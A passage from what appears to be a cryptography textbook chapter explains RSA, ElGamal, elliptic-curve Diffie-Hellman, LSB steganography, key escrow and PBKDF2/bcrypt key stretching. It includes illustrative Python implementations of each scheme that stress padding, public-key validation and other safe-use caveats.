RSA is one of the first public key cryptosystems ever invented. It can be used for both encryption and digital signatures. RSA is named after its inventors, Ron Rivest, Adi Shamir, and Leonard Adleman, and was first published in 1977. This algorithm uses the product of two very large prime numbers and works on the principle of difficulty in factoring such large numbers. It's best to choose large prime numbers that are from 100 to 200 digits in length and are equal in length. These two primes will be P and Q. Randomly choose an encryption key, E, so that E is greater than 1, E is less than P*Q, and E is odd. E must also be relatively prime to (P-1) and (Q-1). Then compute the decryption key D as the modular inverse of E:
D = E^-1 mod ((P-1)(Q-1))
Now that the encryption key and decryption key have been generated, the two prime numbers can be discarded, but they should not be revealed. To encrypt a message, it should be divided into blocks Mi, each numerically less than the product of P and Q. Then,
Ci = Mi^E mod (P*Q)
Ci is the output block of ciphertext matching the block length of the input message, M. To decrypt a message, take the ciphertext block Ci and use this function:
Mi = Ci^D mod (P*Q)
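The key generation, block encryption, and decryption above, plus RSA's other use named in this section, signing, carried out in Python with the text's P, Q, E, D and Mi, Ci as an added example (not code from the original text). The small primes 61 and 53 are the usual textbook illustration; the larger pair used for signing is the example's own choice. Two things are the example's additions: the hash-then-sign step reduces a SHA-256 digest modulo N purely for illustration, whereas real RSA signatures and encryption wrap the value in a padding scheme (PKCS#1 v1.5, OAEP, or PSS) and never use the bare "textbook" operation shown here.

```python
"""Textbook RSA in the text's notation, with a toy hash-then-sign, as an added example."""
import hashlib
from math import gcd


def rsa_keygen(P, Q, E):
    """Return (N, E, D) for primes P, Q and chosen E; enforces the conditions the text lists."""
    N = P * Q
    phi = (P - 1) * (Q - 1)
    if not 1 < E < N or E % 2 == 0 or gcd(E, phi) != 1:
        raise ValueError("E must be odd, 1 < E < P*Q, and relatively prime to (P-1)(Q-1)")
    D = pow(E, -1, phi)  # D = E^-1 mod ((P-1)(Q-1)); pow with exponent -1 needs Python 3.8+
    return N, E, D


def rsa_encrypt_blocks(N, E, blocks):
    """Ci = Mi^E mod N for each block; every block must be numerically smaller than N."""
    if any(not 0 <= M < N for M in blocks):
        raise ValueError("each block must be less than P*Q")
    return [pow(M, E, N) for M in blocks]


def rsa_decrypt_blocks(N, D, blocks):
    """Mi = Ci^D mod N."""
    return [pow(C, D, N) for C in blocks]


def block_size(N):
    """Largest whole number of bytes whose integer value is always below N."""
    return max(1, (N.bit_length() - 1) // 8)


def text_to_blocks(msg, N):
    """Split a message into integer blocks that each satisfy Mi < N."""
    k = block_size(N)
    return [int.from_bytes(msg[i:i + k], "big") for i in range(0, len(msg), k)]


def blocks_to_text(blocks, N, length):
    """Inverse of text_to_blocks; `length` recovers the shorter final block."""
    if not blocks:
        return b""
    k = block_size(N)
    full = b"".join(M.to_bytes(k, "big") for M in blocks[:-1])
    return full + blocks[-1].to_bytes(length - len(full), "big")


def digest_as_int(message, N):
    """Toy hash-then-sign input: SHA-256 digest reduced mod N (real schemes pad instead)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def rsa_sign(N, D, message):
    """Signature = H(message)^D mod N: the private key 'encrypts' the digest."""
    return pow(digest_as_int(message, N), D, N)


def rsa_verify(N, E, message, signature):
    """Anyone with E can recover the digest and compare it with a freshly computed one."""
    return 0 <= signature < N and pow(signature, E, N) == digest_as_int(message, N)


if __name__ == "__main__":
    N, E, D = rsa_keygen(61, 53, 17)            # N = 3233, D = 2753
    msg = b"Attack at dawn"                     # constructed sample message
    cipher = rsa_encrypt_blocks(N, E, text_to_blocks(msg, N))
    print(cipher)
    print(blocks_to_text(rsa_decrypt_blocks(N, D, cipher), N, len(msg)))
    N2, E2, D2 = rsa_keygen(1000003, 999983, 65537)
    sig = rsa_sign(N2, D2, msg)
    print(rsa_verify(N2, E2, msg, sig), rsa_verify(N2, E2, msg + b".", sig))
```

With N = 3233 each block is a single byte, which shows why textbook RSA on its own is a deterministic substitution over the block space: identical plaintext blocks give identical ciphertext blocks, another reason padding is mandatory in practice.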
The use of the second key retrieves the plaintext of the message. This is a simple function, but its security has withstood the test of almost 40 years of analysis, provided the primes are large and properly generated and the bare "textbook" operation shown here is wrapped in a padding scheme such as OAEP (for encryption) or PSS (for signatures). Considering the effectiveness of RSA's security and the ability to have two keys, why are symmetric encryption algorithms needed at all? The answer is speed. RSA in software can be 100 times slower than DES, and the gap in hardware is larger still. RSA can be used to perform both regular encryption and digital signatures. Digital signatures try to duplicate the functionality of a physical signature on a document using encryption. Typically, RSA and the other public key systems are used in conjunction with symmetric key cryptography. Public key, the slower protocol, is used to exchange the symmetric key (or shared secret), and then the communication uses the faster symmetric key protocol. This process is known as electronic key exchange. Since the security of RSA is based upon the supposed difficulty of factoring large numbers, the main weaknesses are in the implementations of the protocol: poor random number generation when choosing the primes, missing or weak padding, and side channels. RSA was a patented algorithm until the patent expired in 2000, but it was a de facto standard for many years.
ElGamal
ElGamal can be used for both encryption and digital signatures. Taher ElGamal designed the system in the early 1980s. This system was never patented and is free for use. The Digital Signature Algorithm (DSA), the U.S. government standard for digital signatures, is a variant of the ElGamal signature scheme. The system is based upon the difficulty of calculating discrete logarithms in a finite field. Three numbers are needed to generate a key pair. User 1 chooses a prime, P, a generator D of the multiplicative group modulo P, and a random number F; both D and F should be less than P. Then user 1 can calculate the public key A:
A = D^F mod P
Then A, D, and P are shared with the second user, with F being the private key. To encrypt a message, M (with M < P), a random key, k, is chosen that is relatively prime to P-1. Then,
C1 = D^k mod P
C2 = A^k * M mod P
C1 and C2 make up the ciphertext, which is therefore twice the size of the plaintext. Decryption is done by
M = C2 / C1^F mod P
that is, C2 multiplied by the modular inverse of C1^F. The value k must be fresh for every message: if two messages share a k, the ratio of their plaintexts is exposed.
ElGamal uses a different function for digital signatures. To sign a message, M, once again choose a random value k that is relatively prime to P-1. Then,
C1 = D^k mod P
C2 = (M - C1*F) / k (mod P-1)
where division by k means multiplication by the inverse of k modulo P-1. C1 concatenated to C2 is the digital signature; a verifier accepts it if D^M = A^C1 * C1^C2 (mod P). Reusing k across two signatures reveals the private key F. ElGamal is an effective algorithm and has been in use for some time. It is used primarily for digital signatures. Like all asymmetric cryptography, it is slower than symmetric cryptography.
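The encryption, decryption, signing, and verification formulas above in Python, keeping the text's names P, D, F, A, k, C1, and C2, as an added example (not code from the original text). The values P = 467, D = 2, F = 127 and k = 213 are a standard small illustration; the verification check, the gcd test on k, and the random per-message k are written out because the text describes them only in prose. In practice the signed M is a hash of the message, not the message itself.

```python
"""ElGamal encryption and signatures in the text's notation, as an added example."""
import secrets
from math import gcd


def elgamal_keygen(P, D, F):
    """Public key A = D^F mod P for prime P, generator D, private F (0 < F < P-1)."""
    if not 0 < F < P - 1:
        raise ValueError("F must satisfy 0 < F < P-1")
    return pow(D, F, P)


def random_k(P):
    """Fresh per-message k relatively prime to P-1 (reuse leaks plaintext ratios or the private key)."""
    while True:
        k = secrets.randbelow(P - 2) + 1
        if gcd(k, P - 1) == 1:
            return k


def _check_k(P, k):
    if k is None:
        return random_k(P)
    if not 0 < k < P - 1 or gcd(k, P - 1) != 1:
        raise ValueError("k must be relatively prime to P-1")
    return k


def elgamal_encrypt(P, D, A, M, k=None):
    """(C1, C2) = (D^k mod P, A^k * M mod P) for a message M < P."""
    if not 0 <= M < P:
        raise ValueError("M must be less than P")
    k = _check_k(P, k)
    C1 = pow(D, k, P)
    C2 = pow(A, k, P) * M % P
    return C1, C2


def elgamal_decrypt(P, F, C1, C2):
    """M = C2 / C1^F mod P, i.e. C2 times the modular inverse of C1^F (pow(x, -1, P) needs Python 3.8+)."""
    return C2 * pow(pow(C1, F, P), -1, P) % P


def elgamal_sign(P, D, F, M, k=None):
    """Signature (C1, C2): C1 = D^k mod P, C2 = (M - C1*F) * k^-1 mod (P-1)."""
    k = _check_k(P, k)
    C1 = pow(D, k, P)
    C2 = (M - C1 * F) * pow(k, -1, P - 1) % (P - 1)
    return C1, C2


def elgamal_verify(P, D, A, M, C1, C2):
    """Accept if D^M == A^C1 * C1^C2 (mod P); the range check on C1 blocks forged C1 = 0."""
    if not 0 < C1 < P:
        return False
    return pow(D, M, P) == pow(A, C1, P) * pow(C1, C2, P) % P


if __name__ == "__main__":
    P, D, F = 467, 2, 127
    A = elgamal_keygen(P, D, F)                  # 132
    C1, C2 = elgamal_encrypt(P, D, A, 100, k=213)
    print(A, (C1, C2), elgamal_decrypt(P, F, C1, C2))
    sig = elgamal_sign(P, D, F, 100, k=213)      # (29, 51)
    print(sig, elgamal_verify(P, D, A, 100, *sig), elgamal_verify(P, D, A, 101, *sig))
```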
ECC
Elliptic curve cryptography (ECC) works on the basis of elliptic curves. An elliptic curve is a simple function that is drawn as a gently looping curve on the X,Y plane. Elliptic curves (in the short Weierstrass form used in cryptography) are defined by this equation:
y^2 = x^3 + ax + b
Elliptic curves work because they have a special property: you can add two points on the curve together and get a third point on the curve, as shown in the illustration. For cryptographic use the curve is taken over a finite field (the coordinates are integers reduced modulo a large prime), so the gently looping curve becomes a finite set of points, but the addition rule is the same.
For cryptography, the elliptic curve works as a public key algorithm. Users agree on an elliptic curve and a fixed curve point, F. This information is not a shared secret, and these points can be made public without compromising the security of the system. User 1 then chooses a secret random number, K1, and computes a public key based upon a point on the curve:
P1 = K1 * F
User 2 performs the same function and generates P2. Now user 1 can send user 2 a message by generating a shared secret:
S = K1 * P2
User 2 can generate the same shared secret independently:
S = K2 * P1
This is true because
K1 * P2 = K1 * (K2 * F) = (K1 * K2) * F = K2 * (K1 * F) = K2 * P1
Here K * F means adding the point F to itself K times; recovering K from F and K * F is the elliptic curve discrete logarithm problem, and the security of the system rests on its difficulty.
The security of elliptic curve systems has been questioned, mostly because of lack of analysis. However, all public key systems rely on the difficulty of certain math problems. It would take a breakthrough in math for any of the mentioned systems to be weakened dramatically, but research has been done about the problems and has shown that the elliptic curve problem has been more resistant to incremental advances. Again, as with all cryptography algorithms, only time will tell how secure they really are. The big benefit to ECC systems is that they require less computing power for a given bit strength. This makes ECC ideal for use in low-power mobile devices. The surge in mobile connectivity has led to secure voice, e-mail, and text applications that use ECC and AES algorithms to protect a user's data. Elliptic curve functions can be used as part of a Diffie-Hellman key exchange, and when used, the method is referred to as Elliptic Curve Diffie-Hellman (ECDH). This technique can provide the advantages of elliptic curve and the functionality of Diffie-Hellman.
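The point addition and the K1 * P2 = K2 * P1 identity above, implemented over a tiny prime field in Python as an added example (not code from the original text). The curve y^2 = x^3 + x + 6 over the integers modulo 11 with base point F = (2, 7) is a standard toy example with 13 points; the names F, K1, K2, P1, P2 and S follow the text. The check that a peer's point actually lies on the curve is the example's own addition: feeding an off-curve point into this arithmetic is the basis of the invalid-curve attack, so real implementations validate public keys before use.

```python
"""Toy ECDH: chord-and-tangent addition over F_p and double-and-add, as an added example."""

INF = None  # the point at infinity, the identity element of the curve group


def is_on_curve(pt, a, b, p):
    """True if pt satisfies y^2 = x^3 + ax + b (mod p); the identity counts as on the curve."""
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x * x * x + a * x + b)) % p == 0


def point_add(pt1, pt2, a, p):
    """Add two points on y^2 = x^3 + ax + b over F_p (modular inverse via pow, Python 3.8+)."""
    if pt1 is INF:
        return pt2
    if pt2 is INF:
        return pt1
    x1, y1 = pt1
    x2, y2 = pt2
    if x1 == x2 and (y1 + y2) % p == 0:
        return INF  # pt2 == -pt1 (also covers doubling a point whose y is 0)
    if pt1 == pt2:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p   # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p          # chord slope
    x3 = (lam * lam - x1 - x2) % p
    y3 = (lam * (x1 - x3) - y1) % p
    return (x3, y3)


def scalar_mult(k, pt, a, p):
    """k * pt, i.e. pt added to itself k times, by double-and-add."""
    if k < 0:
        raise ValueError("scalar must be non-negative")
    result, addend = INF, pt
    while k:
        if k & 1:
            result = point_add(result, addend, a, p)
        addend = point_add(addend, addend, a, p)
        k >>= 1
    return result


def ecdh(a, b, p, F, K1, K2):
    """Both sides' computations; returns (P1, P2, S as user 1 computes it, S as user 2 computes it)."""
    P1 = scalar_mult(K1, F, a, p)   # user 1's public point
    P2 = scalar_mult(K2, F, a, p)   # user 2's public point
    # Example's own check: validate the peer's point before using it (invalid-curve attack).
    for peer in (P1, P2):
        if peer is INF or not is_on_curve(peer, a, b, p):
            raise ValueError("invalid peer public point")
    S1 = scalar_mult(K1, P2, a, p)  # user 1: K1 * P2
    S2 = scalar_mult(K2, P1, a, p)  # user 2: K2 * P1
    return P1, P2, S1, S2


if __name__ == "__main__":
    A, B, PRIME, F = 1, 6, 11, (2, 7)
    print([scalar_mult(n, F, A, PRIME) for n in range(1, 14)])   # 13 F is the identity
    print(ecdh(A, B, PRIME, F, 4, 9))                             # both sides get (8, 8)
```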
Asymmetric Encryption Summary
Asymmetric encryption creates the possibility of digital signatures and also corrects the main weakness of symmetric cryptography. The ability to send messages securely without senders and receivers having had prior contact has become one of the basic concerns with secure communication. Digital signatures will enable faster and more efficient exchange of all kinds of documents, including legal documents. With strong algorithms and good key lengths, security can be assured.
Symmetric vs. Asymmetric
Both symmetric and asymmetric encryption methods have advantages and disadvantages. Symmetric encryption tends to be faster, is less computationally involved, and is better for bulk transfers. But it suffers from a key management problem in that keys must be protected from unauthorized parties. Asymmetric methods resolve the key secrecy issue with public keys, but add significant computational complexity that makes them less suited for bulk encryption. Bulk encryption can be done using the best of both systems, by using asymmetric encryption to pass a symmetric key. By adding in ephemeral key exchange, you can achieve perfect forward secrecy, discussed later in the chapter. Digital signatures, a highly useful tool, are not practical without asymmetric methods.
Quantum Cryptography
Cryptography is traditionally a very conservative branch of information technology. It relies on proven technologies and does its best to resist change. A big new topic in recent years has been quantum cryptography. Quantum cryptography is based on quantum mechanics, principally superposition and entanglement. A discussion of quantum mechanics is beyond the scope of this text, but the principle we are most concerned with in regard to cryptography is that in quantum mechanics, measuring data disturbs the data. What this means to cryptographers is that it is easy to tell if a message has been eavesdropped on in transit, allowing people to exchange key data while knowing that the data was not intercepted in transit. This use of quantum cryptography is called quantum key distribution. This is currently the only commercial use of quantum cryptography, and although there are several methods for sending the key, they all adhere to the same principle. Key bits are sent and then checked at the remote end for interception, and then more key bits are sent using the same process. Once an entire key has been sent securely, symmetric encryption can then be used.
The other field of research involving quantum mechanics and cryptography is quantum cryptanalysis. A quantum computer running Shor's algorithm could factor the large composite numbers (products of two primes) on which RSA depends exponentially faster than a classical computer, and it solves the discrete logarithm problems behind Diffie-Hellman and ECC just as efficiently, potentially making all of these public key systems insecure. This has led to research in cryptosystems that are not vulnerable to quantum computations, a field known as post-quantum cryptography.
Steganography
Steganography, an offshoot of cryptography technology, gets its meaning from the Greek word steganos, meaning covered. Invisible ink placed on a document hidden by innocuous text is an example of a steganographic message. Another example is a tattoo placed on the top of a person's head, visible only when the person's hair is shaved off. Hidden writing in the computer age relies on a program to hide data inside other data. The most common application is the concealing of a text message in a picture file. The Internet contains multiple billions of image files, allowing a hidden message to be located almost anywhere without being discovered. Because not all detection programs can detect every kind of steganography, trying to find the message in an Internet image is akin to attempting to find a needle in a haystack the size of the Pacific Ocean; even a Google search for steganography returns thousands of images.
The nature of the image files also makes a hidden message difficult to detect. While it is most common to hide messages inside images, they can also be hidden in video and audio files. The advantage to steganography over the use of encryption alone is that the messages do not attract attention, and this difficulty in detecting the hidden message provides an additional barrier to analysis. The data that is hidden in a steganographic message is frequently also encrypted, so that if it is discovered, the message will remain secure. Steganography has many uses, but the most publicized uses are to hide illegal material, often pornography, or allegedly for covert communication by terrorist networks.
Steganographic encoding can be used in many ways and through many different media. Covering them all is beyond the scope of this book, but we will discuss one of the most common ways to encode into an image file, LSB encoding. LSB, Least Significant Bit, is a method of encoding information into an image while altering the actual visual image as little as possible. A computer image is made up of thousands or millions of pixels, all defined by 1s and 0s. If an image is composed of Red Green Blue (RGB) values, each pixel has an RGB value represented numerically from 0 to 255. For example, 0,0,0 is black, and 255,255,255 is white, which can also be represented as 00000000,00000000,00000000 for black and 11111111,11111111,11111111 for white. Given a white pixel, editing the least significant bit of each channel to give 11111110,11111110,11111110 changes the color. The change in color is undetectable to the human eye, but in an image with a million pixels, one bit per channel creates a 375 KB area in which to store a message (125 KB if only one channel per pixel is used). Some popular steganography detection tools include Stegdetect, StegSecret, StegSpy, and the family of SARC tools. All of these tools use detection techniques based upon the same principle, pattern detection. By looking for known steganographic encoding schemes or artifacts, they can potentially detect embedded data. Additionally, steganography insertion tools can be used to attempt to decode images with suspected hidden messages. Invisible Ink is a small program for steganographic insertion of messages and then the extraction of those messages, as illustrated here.
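The LSB encoding described above, implemented in Python on a constructed list of RGB pixels rather than a real image file, as an added example (not code from the original text or from any of the tools it names). The 4-byte length header in front of the payload is the example's own framing convention so that extraction knows where the message ends; the capacity function reproduces the "three bits per pixel" arithmetic from the text.

```python
"""LSB steganography on a constructed RGB pixel list, as an added example."""

HEADER_BYTES = 4  # example's own framing: payload length precedes the payload


def lsb_capacity_bytes(width, height, channels=3):
    """Raw bytes that fit when one bit is hidden per colour channel (1,000,000 px -> 375,000)."""
    return width * height * channels // 8


def _bits(data):
    """Most-significant-bit-first bit stream over a byte string."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(pixels, payload):
    """Return a copy of pixels (list of (r, g, b) tuples) with payload hidden in the LSBs."""
    framed = len(payload).to_bytes(HEADER_BYTES, "big") + payload
    if len(framed) * 8 > len(pixels) * 3:
        raise ValueError("payload too large for this image")
    bit_source = _bits(framed)
    out = []
    for px in pixels:
        new_px = []
        for channel in px:
            bit = next(bit_source, None)
            # Clear the LSB and write the payload bit; channels past the payload are untouched.
            new_px.append(channel if bit is None else (channel & 0xFE) | bit)
        out.append(tuple(new_px))
    return out


def _bytes_from_bits(bits):
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def lsb_extract(pixels):
    """Read every channel's LSB, parse the length header, and return the payload."""
    bits = [channel & 1 for px in pixels for channel in px]
    length = int.from_bytes(_bytes_from_bits(bits[:HEADER_BYTES * 8]), "big")
    start = HEADER_BYTES * 8
    return _bytes_from_bits(bits[start:start + 8 * length])


def max_channel_change(before, after):
    """Largest per-channel difference the embedding caused; LSB changes are at most 1."""
    return max(abs(x - y) for p1, p2 in zip(before, after) for x, y in zip(p1, p2))


def constructed_image(width, height, colour=(255, 255, 255)):
    """A flat image of one colour, constructed here as sample input."""
    return [colour] * (width * height)


if __name__ == "__main__":
    cover = constructed_image(8, 8)                       # 64 pixels, 192 usable bits
    stego = lsb_embed(cover, b"meet at noon")             # constructed sample message
    print(lsb_extract(stego), max_channel_change(cover, stego))
    print(lsb_capacity_bytes(1000, 1000))
```

A flat white cover image is the worst case for staying hidden: every channel was 255 and the embedded ones are now 254 or 255, which is exactly the kind of statistical artifact the pattern-based detectors named above look for. Real carriers are noisy photographs, and encrypting the payload first (as the text recommends) removes the obvious structure from the embedded bits.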
Cryptography Algorithm Use
The use of cryptographic algorithms grows every day. More and more information becomes digitally encoded and placed online, and all of this data needs to be secured. The best way to do that with current technology is to use encryption. This section considers some of the tasks cryptographic algorithms accomplish and those for which they are best suited. Security is typically defined as a product of five components: confidentiality, integrity, availability, authentication, and nonrepudiation. Encryption addresses all of these components except availability. Key escrow will be one of the most important topics as information becomes universally encrypted; otherwise, everyone may be left with useless data. Digital rights management and intellectual property protection are also places where encryption algorithms are heavily used. Digital signatures combine several algorithms to provide reliable identification in a digital form.
Confidentiality
Confidentiality typically comes to mind when the term security is brought up. Confidentiality is the ability to keep some piece of data a secret. In the digital world, encryption excels at providing confidentiality. In most cases, symmetric encryption is favored because of its speed and because some asymmetric algorithms can significantly increase the size of the object being encrypted. Asymmetric cryptography also can be used to protect confidentiality, but its size and speed make it more efficient at protecting the confidentiality of small units for tasks such as electronic key exchange. In all cases, the strength of the algorithms and the length of the keys ensure the secrecy of the data in question.
Integrity
Integrity, better known as message integrity, is a crucial component of message security. When a message is sent, both the sender and recipient need to know that the message was not altered in transmission. This is especially important for legal contracts: recipients need to know that the contracts have not been altered. Signers also need a way to validate that a contract they sign will not be altered in the future.
Message integrity will become increasingly important as more commerce is conducted digitally. The ability to independently make sure that a document has not been tampered with is very important to commerce. More importantly, once the document is "signed" with a digital signature, it cannot be refuted that the person in question signed it.
Integrity is provided via one-way hash functions and digital signatures. The hash functions compute message digests, and this guarantees the integrity of the message by allowing easy testing to determine whether any part of the message has been changed. The message now carries a computed value (the hash) that tells the users to resend the message if it was intercepted and interfered with. A bare hash only detects accidental corruption, however, since anyone able to alter the message can recompute the digest as well; to detect deliberate tampering the hash must be bound to a key, either as a keyed hash (MAC) or as a digital signature. The hash value is combined with asymmetric cryptography by taking the message's hash value and encrypting it with the user's private key (signing). This lets anyone with the user's public key decrypt the hash and compare it to the locally computed hash, not only ensuring the integrity of the message but positively identifying the sender.
Authentication
Authentication is the matching of a user to an account through previously shared credentials. This information must be protected, and a combination of cryptographic methods is commonly employed. From hashing to key stretching to encryption and digital signatures, multiple techniques are used as part of the operations involved in authentication.
Try This!
Document Integrity
Download a hash calculator that works on your operating system, such as SlavaSoft HashCalc, available at www.slavasoft.com/hashcalc/index.htm. Then create a simple document file with any text that you prefer. Save it, and then use the hashing program to generate the hash and save the hash value. Now edit the file, even by simply inserting a single blank space, and resave it. Recalculate the hash and compare.
Nonrepudiation
An item of some confusion, the concept of nonrepudiation is actually fairly simple. Nonrepudiation means that the message sender cannot later deny that they sent the message. This is important in electronic exchanges of data, because of the lack of face-to-face meetings. Nonrepudiation is based upon public key cryptography and the principle of only you knowing your private key. The presence of a message signed by you, using your private key, which nobody else should know, is an example of nonrepudiation. When a third party can check your signature using your public key, that disproves any claim that you were not the one who actually sent the message. Nonrepudiation is tied to asymmetric cryptography and cannot be implemented with symmetric algorithms, since with a shared key either party could have produced the message.
Tech Tip
HOTP
The HMAC-based One-Time Password (HOTP) algorithm (RFC 4226) is a key component of the Initiative for Open Authentication (OATH). YubiKey hardware tokens, which are in significant use, implement HOTP.
Cipher Suites
In many applications, the use of cryptography occurs as a collection of functions. Different algorithms can be used for authentication, encryption/decryption, digital signatures, and hashing. The term cipher suite refers to an arranged group of algorithms. For instance, TLS has a published TLS Cipher Suite Registry at www.iana.org/assignments/tls-parameters/tls-parameters.xhtml.
Strong vs. Weak Ciphers
There is a wide range of ciphers, some old and some new, each with its own strengths and weaknesses. Over time, new methods and computational abilities change the viability of ciphers. The concept of strong versus weak ciphers is an acknowledgment that, over time, ciphers can become vulnerable to attacks; DES and RC4, discussed earlier in this chapter, are examples of ciphers that were once standard and are now considered weak. The application or selection of ciphers should take into consideration that not all ciphers are still strong. When selecting a cipher for use, it is important to make an appropriate choice.
Key Exchange
Cryptographic mechanisms use both an algorithm and a key, with the key requiring communication between parties. In symmetric encryption, the secrecy depends upon the secrecy of the key, so insecure transport of the key can lead to failure to protect the information encrypted using the key. Key exchange is the central foundational element of a secure symmetric encryption system. Maintaining the secrecy of the symmetric key is the basis of secret communications. In asymmetric systems, the key exchange problem is one of key publication. Because public keys are designed to be shared, the problem is reversed from one of secrecy to one of publicity. Early key exchanges were performed by trusted couriers. People carried the keys from senders to receivers. One could consider this form of key exchange to be the ultimate in out-of-band communication. With the advent of digital methods and some mathematical algorithms, it is possible to pass keys in a secure fashion. This can occur even when all packets are subject to interception. The Diffie-Hellman key exchange is one example of this type of secure key exchange. The Diffie-Hellman key exchange depends upon two random numbers, each chosen by one of the parties, and kept secret. Diffie-Hellman key exchanges can be performed in-band, and even under external observation, as the secret random numbers are never exposed to outside parties.
Key Escrow
The impressive growth of the use of encryption technology has led to new methods for handling keys. Encryption is adept at hiding all kinds of information, and with privacy and identity protection becoming more of a concern, more information is encrypted. The loss of a key can happen for a multitude of reasons: it might simply be lost, the key holder might be incapacitated or dead, software or hardware might fail, and so on. In many cases, that information is locked up until the cryptography can be broken, and, as you have read, that could be millennia. This has raised the topic of key escrow, or keeping a copy of the encryption key with a trusted third party. Theoretically, this third party would only release your key to you or your official designate in the event of your being unable to get the key yourself. However, just as the old saying from Benjamin Franklin goes, "Three may keep a secret, if two of them are dead." Any time more than one copy of the key exists, the security of the system is weakened. The extent of the insecurity of key escrow is a subject open to debate, and will be hotly contested in the years to come.
Tech Tip
Key Escrow Has Benefits and Hazards
Key escrow can solve many of the problems that result when a key is lost or becomes inaccessible, allowing access to data that otherwise would be impossible to access without key escrow, but it can open up private information to unauthorized access.
Additionally, with computer technology being miniaturized into smartphones and other relatively inexpensive devices, criminals and other ill-willed people have begun using cryptography to conceal communications and business dealings from law enforcement agencies. Because law enforcement agencies have not been able to break the encryption in many cases, government agencies have begun asking for mandatory key escrow legislation. In this sense, key escrow is a system by which your private key is kept both by you and by the government. This allows people with a court order to retrieve your private key to gain access to anything encrypted with your public key. The data is essentially encrypted by your key and the government key, giving the government access to your plaintext data. This process is similar to a search warrant of your home, but is used against your computer data. Whether or not this is how things should be is also open to debate, but it does raise the interesting possibility of encryption software that is incompatible with government key escrow being banned. The last major discussion of key escrow legislation was several years ago, but the prospect remains out there waiting for a high-profile case to bring encryption into the spotlight. In 2015, many U.S. federal officials again called for forms of key escrow and backdoors in the name of anti-terrorism and law enforcement. The result of this new round of argument will take years to decide the correct balance. Key escrow can negatively impact the security provided by encryption, because the government requires a huge, complex infrastructure of systems to hold every escrowed key, and the security of those systems is weaker than the security of your memorizing the key; the escrow database itself becomes a high-value target. However, there are two sides to the key escrow coin. Without a practical way to recover a key if or when it is lost or the key holder dies, for example, some important information will be lost forever. Such issues will affect the design and security of encryption technologies for the foreseeable future.
Session Keys
A session key is a symmetric key used for encrypting messages during a communication session. It is generated from random seeds and is used for the duration of a communication session. When correctly generated and propagated during session setup, a session key provides significant levels of protection during the communication session and also can afford perfect forward secrecy (described later in the chapter). Session keys offer the advantages of symmetric encryption (speed, strength, simplicity) and, with key exchanges possible via digital methods, significant levels of automated security.
Ephemeral Keys
Ephemeral keys are cryptographic keys that are used only once after they are generated. When an ephemeral key is used as part of the Diffie-Hellman scheme, it forms an Ephemeral Diffie-Hellman (EDH, more commonly written DHE) key exchange. An EDH mechanism generates a temporary key for each connection, never using the same key twice. This provides for perfect forward secrecy. If the Diffie-Hellman involves the use of elliptic curves, it is called Elliptic Curve Diffie-Hellman Ephemeral (ECDHE).
Key Stretching
Key stretching is a mechanism that takes what would be weak keys and "stretches" them to make the system more secure against brute-force attacks. A typical methodology used for key stretching involves increasing the computational complexity by adding iterative rounds of computations. To extend a password to a longer key, you can run it through many rounds of hashing, each round feeding the next. This may take hundreds or thousands of rounds, but for a single legitimate use, the time is not significant. When an attacker wants to use a brute-force attack, the increase in computational workload becomes significant when done billions of times, making this form of attack much more expensive. The common forms of key stretching employed in use today include Password-Based Key Derivation Function 2 and bcrypt.
PBKDF2
Password-Based Key Derivation Function 2 (PBKDF2) is a key derivation function designed to produce a key derived from a password. This function uses a password or passphrase and a salt and applies an HMAC to the input thousands of times. The salt ensures that two users with the same password get different keys, defeating precomputed tables, and the repetition multiplies the cost of every guess an attacker makes; with a sufficiently high iteration count, brute-force attacks become impractically expensive.
bcrypt
Bcrypt is a key-stretching mechanism that uses the Blowfish cipher and salting, and adds an adaptive cost factor to increase the number of iterations as hardware gets faster. The result is the same as with other key-stretching mechanisms: a single use is computationally feasible, but the billions of attempts needed to brute-force the function make the attack computationally impractical.
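PBKDF2 written out from its definition (the iterated HMAC the text describes) and checked against the standard library's hashlib.pbkdf2_hmac, plus the salted derive and constant-time verify calls a login system would use, as an added example (not code from the original text). The iteration count and the SHA-256 choice are the example's own; bcrypt is not in the Python standard library and is not shown.

```python
"""PBKDF2 from its definition, checked against hashlib, as an added example."""
import hashlib
import hmac
import secrets


def pbkdf2_from_scratch(hash_name, password, salt, iterations, dklen):
    """PBKDF2: for each output block i, T_i = U_1 XOR ... XOR U_c where
    U_1 = HMAC(password, salt || INT(i)) and U_j = HMAC(password, U_{j-1})."""
    if iterations < 1:
        raise ValueError("iterations must be >= 1")
    hlen = hashlib.new(hash_name).digest_size

    def prf(data):
        return hmac.new(password, data, hash_name).digest()

    derived = b""
    block_index = 1
    while len(derived) < dklen:
        u = prf(salt + block_index.to_bytes(4, "big"))
        t = bytearray(u)
        for _ in range(iterations - 1):      # the repeated HMAC rounds the text describes
            u = prf(u)
            for i in range(hlen):
                t[i] ^= u[i]
        derived += bytes(t)
        block_index += 1
    return derived[:dklen]


ITERATIONS = 600_000   # example's own choice; raise it as hardware gets faster


def derive_key(password, salt=None, iterations=ITERATIONS):
    """Return (salt, key) from the stdlib PBKDF2-HMAC-SHA256 with a random 16-byte salt."""
    if salt is None:
        salt = secrets.token_bytes(16)
    key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, 32)
    return salt, key


def verify_password(password, salt, iterations, expected_key):
    """Recompute and compare in constant time so the comparison itself leaks nothing."""
    _, key = derive_key(password, salt, iterations)
    return hmac.compare_digest(key, expected_key)


if __name__ == "__main__":
    mine = pbkdf2_from_scratch("sha256", b"password", b"salt", 1000, 48)
    print(mine == hashlib.pbkdf2_hmac("sha256", b"password", b"salt", 1000, 48))
    salt, key = derive_key(b"correct horse battery staple")     # constructed sample password
    print(verify_password(b"correct horse battery staple", salt, ITERATIONS, key))
    print(verify_password(b"correct horse battery stapler", salt, ITERATIONS, key))
```

Doubling the iteration count doubles the attacker's cost per guess while adding only milliseconds to one legitimate login, which is the whole point of key stretching.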
Secrecy Principles  There are several conditions and principles associated with secrecy. Two of these, confusion and diffusion, arise from Claude Shannon's seminal work in communication theory. The concept of entropy, presented earlier, is from the same source. While these are theory-centric ideas, there are implementation principles as well. Perfect forward secrecy is one of these, as it applies to the secrecy of previously recorded messages.

